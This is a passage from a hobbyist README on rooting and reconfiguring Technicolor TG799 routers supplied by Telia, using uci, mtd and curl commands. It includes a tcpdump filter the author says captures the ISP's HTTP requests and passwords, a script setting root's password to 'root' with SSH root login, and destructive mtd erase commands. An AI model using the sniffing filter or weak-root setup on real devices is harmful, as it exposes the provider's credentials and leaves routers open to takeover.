filter f_user { facility(user); };
filter f_debug { not facility(auth, authpriv, news, mail); };
filter f_messages { level(info..warn)
    and not facility(auth, authpriv, mail, news); };
filter f_emergency { level(emerg); };
filter f_info { level(info); };
filter f_notice { level(notice); };
filter f_warn { level(warn); };
filter f_crit { level(crit); };
filter f_err { level(err); };
filter f_failed { message("failed"); };
filter f_denied { message("denied"); };

# connect filter and destination
log { source(src); filter(f_authpriv); destination(authlog); };
log { source(src); filter(f_syslog); destination(syslog); };
log { source(src); filter(f_cron); destination(cron); };
log { source(src); filter(f_daemon); destination(daemon); };
log { source(kernsrc); filter(f_kern); destination(kern); };
log { source(src); filter(f_lpr); destination(lpr); };
log { source(src); filter(f_mail); destination(mail); };
log { source(src); filter(f_user); destination(user); };
log { source(src); filter(f_mail); filter(f_info); destination(mailinfo); };
log { source(src); filter(f_mail); filter(f_warn); destination(mailwarn); };
log { source(src); filter(f_mail); filter(f_err); destination(mailerr); };
log { source(src); filter(f_debug); destination(debug); };
log { source(src); filter(f_messages); destination(messages); };
log { source(src); filter(f_emergency); destination(console); };

# default log
log { source(src); destination(console_all); };

Now restart system on your router and you should see * messages:

/etc/init.d/system restart
Enable or Disable Time of Day ACL rules:
uci set tod.global.enabled='0'
For login with debug mode enabled, then please go to (Proably not possible but it is to try):
http://192.168.1.1/?debug=1
Enable or Disable so your router wont restart if there is an segmentation fault in a user space program:
uci set system.@coredump[0].reboot='0'
uci commit system

Just type below command for print the accesskey:

Just printing the first 8 characetrs from 0124 file

sed -e 's/^\(.\{8\}\).*/\1/' /proc/rip/0124

You can check the current running dns with

cat /etc/resolv.conf
Enable or Disable Content Sharing (Samba / DNLA):
uci set samba.samba.enabled='1'
uci set dlnad.config.enabled='1'

Disable Time of Day ACL rules

uci set tod.global.enabled='1'

To disable mobile card since there is no button, execute:

uci set mobiled.device_defaults.enabled=0
uci commit

List installed packages:

opkg list_installed 

Add a new new modal:

uci set web.modalsmodalrule=rule
uci set web.ruleset_main.rules=modalsmodalsrule
uci add_list web.l2tpipsecservermodal.target='/modals/modals-name.lp'
uci set web.l2tpipsecservermodal.roles='roles'

A minimal alias definition for a bridged interface might be:

config interface lan
    option 'ifname' 'eth0'
    option 'type' 'bridge'
    option 'proto' 'static'
    option 'ipaddr' '192.168.1.1'
    option 'netmask' '255.255.255.0'

config interface lan2
    option 'ifname' 'br-lan'
    option 'proto' 'static'
    option 'ipaddr' '10.0.0.1'
    option 'netmask' '255.255.255.0'

For for a non-bridge interface

config interface lan
    option 'ifname' 'eth0'
    option 'proto' 'static'
    option 'ipaddr' '192.168.1.1'
    option 'netmask' '255.255.255.0'

config interface lan2
    option 'ifname' 'eth0'
    option 'proto' 'static'
    option 'ipaddr' '10.0.0.1'
    option 'netmask' '255.255.255.0'

Use your tg799 router as a switch instead as router:

Here is my example for using all ports for local network and also wan port(5):
cat << "EOF" > /etc/config/network
    config 'switch' 'eth0'
    option 'enable' '1'

    config 'switch_vlan' 'eth0_0'
    option 'device' 'eth0'
    option 'vlan' '0'
    option 'ports' '4 5' #wan

    config 'switch_vlan' 'eth0_1'
    option 'device' 'eth0'
    option 'vlan' '1'
    option 'ports' '3 5' #lan 1

    config 'switch_vlan' 'eth0_2'
    option 'device' 'eth0'
    option 'vlan' '2'
    option 'ports' '2 5' #lan2

    config 'switch_vlan' 'eth0_3'
    option 'device' 'eth0'
    option 'vlan' '3'
    option 'ports' '1 5' #lan3

    config 'switch_vlan' 'eth0_4'
    option 'device' 'eth0'
    option 'vlan' '4'
    option 'ports' '0 5' #lan4 

Create backup of all /dev/mtd[0-7]

Insert your usb that has ext2/ext3 or ext4 format:

for number in $(seq 0 7); do 
    grep -q "\/dev\/sd[a-z]1" /proc/mounts 
    if [[ $? = "0" ]]; then 
        usb_drive=$(grep "\/dev\/sd[a-z][0-9]" /proc/mounts |cut -d' ' -f1);
        mkdir -p /mnt/usb/${usb_drive}/backup_mtd;
    fi
    dd if=/dev/mtd${number} of=/mnt/usb/${usb_drive}/backup_mtd/mtd${number}.img;
done

Result for: 17.2.0405-1441042-20191114170637-ec29699cbbf5c66c53b310489f62a141f46bf628:

 mtd1.img: Squashfs filesystem, little endian, version 4.0, xz compressed, 29719215 bytes, 3791 inodes, blocksize: 262144 bytes, created: Tue May  2 15:59:58 2017
 mtd2.img: ISO-8859 text, with very long lines (65536), with no line terminators
 mtd3.img: data
 mtd4.img: data
 mtd5.img: data
 mtd6.img: data

Just mount mtd1 and play around:

Screenshot

squashfuse mtd1.img /mnt/router/justforfun

Using bridge mode with a dedicated PPPoE ethernet port:

uci set network.lan.dns='1.1.1.1'
uci set network.lan.gateway='192.168.0.254'
uci set mmpbxrvsipnet.sip_net.interface='lan'
uci set mmpbxrvsipnet.sip_net.interface6='lan6'

Add below stuff in same order as i posted them for avoid errors:

List all roles admin is not added to:

uci show|grep \.roles|grep -v admin
uci show|grep \.roles|grep -v admin|cut -d'=' -f1|sed 's/^/uci add_list /g'|sed 's/$/=admin/g' # copy and paste

So, now we want add admin to above roles so we can access same cards as superuser and telia.

Order to add: Rule > Ruleset > Modal > Target

Rules

uci set web.natalghelpermodal=rule
uci set web.relaymodal=rule
uci set web.systemmodal=rule
uci set web.iproutesmodal=rule
uci set web.mmpbxinoutgoingmapmodal=rule
uci set web.ltedoctor=rule
uci set web.ltemodal=rule
uci set web.lteprofiles=rule
uci set web.ltesim=rule
uci set web.ltesms=rule
uci set web.logconnections=rule
uci set web.logviewer=rule
uci set web.logviewer.roles=rule
uci set tod.global.enabled='1'
uci set mobiled.globals.enabled='1'
uci set mobiled.device_defaults.enabled='1'
uci commit; /etc/init.d/nginx restart
Ruleset
uci add_list web.ruleset_main.rules=xdsllowmodal
uci add_list web.ruleset_main.rules=systemmodal
uci add_list web.ruleset_main.rules=diagnostics
uci add_list web.ruleset_main.rules=basicviewaccesscodemodal
uci add_list web.ruleset_main.rules=basicviewwifiguestmodal
uci add_list web.ruleset_main.rules=basicviewwifiguest5GHzmodal
uci add_list web.ruleset_main.rules=basicviewwifipskmodal
uci add_list web.ruleset_main.rules=basicviewwifipsk5GHzmodal
uci add_list web.ruleset_main.rules=basicviewwifissidmodal
uci add_list web.ruleset_main.rules=basicviewwifissid5GHzmodal
uci add_list web.ruleset_main.rules=relaymodal
uci add_list web.ruleset_main.rules=iproutesmodal
uci add_list web.ruleset_main.rules=mmpbxstatisticsmodal
uci commit; /etc/init.d/nginx restart
Targets
uci set web.mmpbxinoutgoingmapmodal.target='/modals/mmpbx-inoutgoingmap-modal.lp'
uci set web.iproutesmodal.target='/modals/iproutes-modal.lp'
uci set web.systemmodal.target='/modals/system-modal.lp'
uci set web.relaymodal.target='/modals/relay-modal.lp'
uci set web.natalghelpermodal.target='/modals/nat-alg-helper-modal.lp'
uci set web.diagnosticstcpdumpmodal.target='/modals/diagnostics-tcpdump-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-accesscode-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifiguest-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifiguest5GHz-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifipsk-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifipsk5GHz-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifissid-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifissid5GHz-modal.lp'
uci set web.ltemodal.target='/modals/lte-modal.lp'
uci set web.ltedoctor.target='/modals/lte-doctor.lp'
uci set web.lteprofiles.target='/modals/lte-profiles.lp'
uci set web.logconnections.target='/modals/log-connections-modal.lp'
uci set web.logviewer.target='/modals/logviewer-modal.lp'
uci set web.ltesms.target='/modals/lte-sms.lp'
uci set web.ltesim.target='/modals/lte-sim.lp'
uci set web.xdsllowmodal.target='/modals/xdsl-low-modal.lp'
uci commit; /etc/init.d/nginx restart
Roles

Show all rules were we want to add ourself (admin)

uci show|grep -i roles|grep -v admin
uci add_list web.uidefault.upgradefw_role=admin
uci add_list web.assistancemodal.roles='admin'
uci add_list web.usermgrmodal.roles='admin'
uci add_list web.todmodal.roles='admin'
uci add_list web.iproutesmodal.roles='admin'
uci add_list web.cwmpconf.roles='admin'
uci add_list web.relaymodal.roles='admin'
uci add_list web.systemmodal.roles='admin'
uci add_list web.natalghelper.roles='admin'
uci add_list web.xdsllowmodal.roles='admin'
uci add_list web.mmpbxprofilemodal.roles='admin'
uci add_list web.ltesms.roles='admin'
uci commit
/etc/init.d/nginx restart

If WEBGUI ever will get broken cause you fucked it up then reset router with ‘rtfd –all (same as press on reset button)’.

If you want to keep files and just reset settings then use ‘rtfd –soft’ instead.

Screenshot

No space left and no commands works at all? Not even rtfd?

Run below command for a full factory reset:

Screenshot

**OBS OBS!! This bricked one of mine cause I wasnt careful enough: **

For all Telia but NOT VDNT-O!!

mtd -r erase rootfs_data

Just for VDNT-O

mtd -r userfs

Remove telia from all roles:

uci show|egrep -i "roles.*telia"|cut -d'=' -f1|sed 's/$/=telia/g'|xargs uci del_list

Once you added above you can browse to system-modal.lp and enable/disable ssh or set router in bootp mode:

Screenshot

…. or enable/disable assistance by your own, just give the credenticals to telia when its needed, feels better? :)

Change port:

assistance_port="$(uci get mwan.remoteassist.dest_ip)"|cut -d '/' -f1)"
uci set web.remote.port='<port>'

Screenshhot

Are you a sneeky bastard as myself? Cool! This is not far away how I got their passwords at top of this README. Figure out that part yourself.

tcpdump -i vlan_mgmt -s 0 -A 'tcp dst port <assistance_port> or tcp dst port 80 and tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420 or tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504F5354' and host <vlan_mgmt_ip>

What does this mean?

See below example:

    Here 0x47455420 depicts the ASCII value of  characters  'G' 'E' 'T' ' '

    ┌───────────┬─────────────┐
    │ Character │ ASCII Value │
    ├───────────┼─────────────┤
    │ G         │ 47          │
    ├───────────┼─────────────┤
    │ E         │ 45          │
    ├───────────┼─────────────┤
    │ T         │ 54          │
    ├───────────┼─────────────┤
    │ Space     │ 20          │
    └───────────┴─────────────┘

So…

It means that you will grab all POST and GET http requests from telias client :)

Failsafe boot for VDNT-O

00-00 - Press start
00-45 - Let it boot until 45s
46-60 - Press Reset button
Wait until it reboots
00-00 - Press start
00-45 - Let it boot until 45s
46-60 - Press Reset button
Wait until it reboots
00-00 - Press start
00-45 - Let it boot until 45s
46-60 - Press Reset button
Wait until it reboots
00-00 - Press start
00-45 - Let it boot until 45s
46-60 - Press Reset button
Wait until it reboot and now let it boot as normal

Failsafe boot for VBNT-H

00-00 - Press start
00-25 - Let it boot until 25s
25-45 - Press Reset button
Wait until it reboots
00-00 - Press start
00-25 - Let it boot until 25s
25-45 - Press Reset button
Wait until it reboots
00-00 - Press start
00-25 - Let it boot until 25s
25-45 - Press Reset button
Wait until it reboots
00-00 - Press start
00-25 - Let it boot until 25s
25-45 - Press Reset button
Wait until it reboot and now let it boot as normal

Go to http://192.168.1.1 and use the exploit, once you entered shell:

echo "bank_1" > /proc/banktable/active

Now you can reboot and lay back :)

Curl via cli

Wifi

curl 'http://192.168.1.1/modals/wireless-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=4ed096466def33a5f7faa0a00d116d7b4f72b27c78b8377839b0885651669e0c' \
  --data-raw 'admin_state=1&standard=bgn&requested_channel=auto&channelwidth20=20MHz&channelwidth40=20MHz&channelwidth80=20MHz&sgi=1&cdd=1&stbc=1&ap_enabled=1&ssid=Telia-1DAA3B&ap_broadcast_ssid=1&security=wpa2-psk&wpa_psk=D4104BC782&wep_key=899BC4B768&radius_authent_ip=&radius_authent_port=1812&radius_authent_secret=899BC4B768&radius_account_ip=&radius_account_port=1813&radius_account_secret=&wps_enabled=0&wps_device_pin_code=&radius_authent_state=&radius_account_state=&acl_mode=unlock&action=SAVE&fromModal=YES&CSRFtoken=847ed2f109f0cd1594d4aa392f4ecf3e3555129620aac7f53511787bc9d41aae' \
  --compressed

Enable IPV6

curl 'http://192.168.1.1/modals/ethernet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=4ed096466def33a5f7faa0a00d116d7b4f72b27c78b8377839b0885651669e0c' \
  --data-raw 'localdevIP=192.168.1.1&localdevmask=255.255.255.0&localIPv6=1&dhcpv4State=server&dhcpStart=64&dhcpLimit=180&leaseTime=1h&dnsServer=192.168.1.1&action=SAVE&fromModal=YES&CSRFtoken=847ed2f109f0cd1594d4aa392f4ecf3e3555129620aac7f53511787bc9d41aae' \
  --compressed

Import config via curl

curl 'http://192.168.1.1/modals/gateway-modal.lp?action=import_config' \
  -X 'POST' \
  -H 'Connection: keep-alive' \
  -H 'Content-Length: 142986' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFPdhvt6tT2AARW9e' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=6f39690ffb1f157ad0564201ae484f75a3f3041c2fd5b7d073b174538c9f36c2' \
  --compressed \
  --insecure

Export config via curl

curl 'http://192.168.1.1/modals/gateway-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=6f39690ffb1f157ad0564201ae484f75a3f3041c2fd5b7d073b174538c9f36c2' \
  --data-raw 'action=export_config&CSRFtoken=86b6d3a28f3cb5b743662f8032d97731fed9a42028b42ab71aa15718c09b2236' \
  --compressed \
  --insecure

Upgrade Firmware

curl 'http://192.168.1.1/modals/gateway-modal.lp?action=getbanksize' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
  --compressed \
  --insecure
curl 'http://192.168.1.1/modals/gateway-modal.lp?action=upgradefw' \
  -X 'POST' \
  -H 'Connection: keep-alive' \
  -H 'Content-Length: 21973672' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLmy6iZzHQwMAbWUk' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
  --compressed
curl 'http://192.168.1.1/modals/gateway-modal.lp?action=upgradefwstatus' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
  --compressed \
  --insecure

Current bank setup:

grep . -r /proc/banktable/
/proc/banktable/notbootedoid:Unknown
/proc/banktable/bootedoid:5dcd7b8d4f5d980688c30569
/proc/banktable/passiveversion:17.2.0405-1441042-20191114170637-ec29699cbbf5c66c53b310489f62a141f46bf628
/proc/banktable/activeversion:Unknown
/proc/banktable/inactive:bank_2
/proc/banktable/active:bank_1
/proc/banktable/notbooted:bank_1
/proc/banktable/booted:bank_2

Setup Ultimate Bank Plan

Accoring to

# Ensure two banks match in sizes
[ $(grep -c bank_ /proc/mtd) = 2 ] && \
[ "$(grep bank_1 /proc/mtd | cut -d' ' -f2)" = \
"$(grep bank_2 /proc/mtd | cut -d' ' -f2)" ] && {
[ "$(cat /proc/banktable/booted)" = "bank_1" ] && {
mtd -e bank_2 write /dev/$(grep bank_1 /proc/mtd | cut -d: -f1) bank_2 && \
mtd verify /dev/$(grep bank_1 /proc/mtd | cut -d: -f1) bank_2 || \
{ echo Clone verification failed, retry; exit; } }
cp -rf /overlay/$(cat /proc/banktable/booted) /tmp/bank_overlay_backup
rm -rf /overlay/*
cp -rf /tmp/bank_overlay_backup /overlay/bank_2
echo bank_1 > /proc/banktable/active
sync
mtd erase bank_1;
echo c > /proc/sysrq-trigger; }

Checking RBI firmware signature

signature_checker -b /tmp/firmware_to_check.rbi [-k /tmp/other_board_to_check.osik]binwalk -e any_decrypted_firmware.bin
mv firmware_to_check.rbi pubkey_to_check.osik _any_decrypted_firmware.bin.extracted/squashfs-root/tmp/
cd _any_decrypted_firmware.bin.extracted/squashfs-root
cp $(which qemu-arm-static) .
sudo chroot . ./qemu-arm-static /usr/bin/signature_checker -b /tmp/firmware_to_check.rbi -k /tmp/pubkey_to_check.osik

Extract RBI and Flash and preserve ssh access

Read more here

Unpack the RBI file:

cat "/tmp/new.rbi" | (bli_parser && echo "Please wait..." && (bli_unseal | dd bs=4 skip=1 seek=1 of="/tmp/new.bin"))

Setup SSH access

mkdir -p /overlay/$(cat /proc/banktable/booted)/etc
chmod 755 /overlay/$(cat /proc/banktable/booted) /overlay/$(cat /proc/banktable/booted)/etc
echo -e "echo root:root | chpasswd
sed -i 's#/root:.*\$#/root:/bin/ash#' /etc/passwd
sed -i -e 's/#//' -e 's#askconsole:.*\$#askconsole:/bin/ash#' /etc/inittab
uci -q set \$(uci show firewall | grep -m 1 \$(fw3 -q print | \
egrep 'iptables -t filter -A zone_lan_input -p tcp -m tcp --dport 22 -m comment --comment \"!fw3: .+\" -j DROP' | \
sed -n -e 's/^iptables.\+fw3: \(.\+\)\".\+/\1/p') | \
sed -n -e \"s/\(.\+\).name='.\+'$/\1/p\").target='ACCEPT'
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci set dropbear.lan.enable='0'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart
rm /overlay/\$(cat /proc/banktable/booted)/etc/rc.local
source /rom/etc/rc.local
" > /overlay/$(cat /proc/banktable/booted)/etc/rc.local
chmod +x /overlay/$(cat /proc/banktable/booted)/etc/rc.local
sync

Then flash firmware

Erase and write new firmware into booted bank

(mtd -e bank_2 write /tmp/new.bin bank_2)

mtd -e $(cat /proc/banktable/booted) write "/tmp/new.bin" $(cat /proc/banktable/booted)

Emulate system crash to hard reboot

echo c > /proc/sysrq-trigger

Backing up configuration

tar -C /overlay -cz -f /tmp/backup-$(date -I).tar.gz $(cat /proc/banktable/booted)

Use the command below to manually create an archive with all your modified files from both firmware banks:

tar -C /overlay -cz -f /tmp/overlay-files-backup-$(date -I).tar.gz bank_1 bank_2

If you prefer, you can rely on sysupgrade to achieve a similar result for the booted bank only.

To save the Config:

sysupgrade -i -b /tmp/sysupgrade-backup-$(date -I).tar.gz

To restore the Config:

sysupgrade -f /tmp/sysupgrade-backup-*.tar.gz

Turn on LED:

echo 1 > /sys/class/leds/power:green/brightness

Turn off LED:

echo 0 > /sys/class/leds/power:red/brightness

Setup permanent SSH access:

uci -q delete dropbear.afg
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart

Some other urls for TG799 hacking, you all rock \m/ -_- \m/

https://weaponizedautism.wordpress.com/2017/07/14/vulnerabilities-in-technicolor-adsl-residential-gateways/
https://hack-technicolor.readthedocs.io/
https://forums.whirlpool.net.au/archive/2650998
https://www.crc.id.au/hacking-the-technicolor-tg799vac-and-unlocking-features/
https://full-disclosure.eu/reports/2019/FDEU-CVE-2019-10222-telia-savitarna-backdoor.html

CONTACT

If you have problems, questions, ideas or suggestions please contact
us by posting to wuseman@nr1.nu

WEB SITE

https://wuseman.nr1.nu

https://nr1.nu 

END!